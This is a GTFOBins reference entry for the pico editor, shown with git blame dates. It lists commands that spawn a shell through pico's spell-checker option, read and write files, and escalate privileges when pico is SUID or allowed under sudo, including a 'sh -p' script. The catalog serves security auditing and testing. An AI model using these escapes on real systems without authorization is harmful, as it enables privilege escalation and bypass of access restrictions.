GTFOBins.github.io/_gtfobins/pico.md

29 lines
449 B
Markdown
Raw Normal View History

2018-05-29 19:23:33 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: |
2019-03-31 13:19:11 +02:00
pico -s /bin/sh
/bin/sh
2018-07-16 15:01:50 +02:00
^T
2018-05-29 19:23:33 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
pico file_to_write
DATA
2018-07-16 15:01:50 +02:00
^O
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: pico file_to_read
2018-10-05 19:55:38 +02:00
suid:
- code: |
2018-07-16 15:01:50 +02:00
TF=$(mktemp)
2019-03-31 13:19:11 +02:00
echo '#!/bin/sh -p
exec sh -p' > $TF
2018-07-16 15:01:50 +02:00
chmod +x $TF
./pico -s $TF /etc/hosts
^T
2018-10-05 19:55:38 +02:00
sudo:
- code: |
2019-03-31 13:19:11 +02:00
pico -s /bin/sh
/bin/sh
2018-07-16 15:01:50 +02:00
^T
2018-05-29 19:23:33 +02:00
---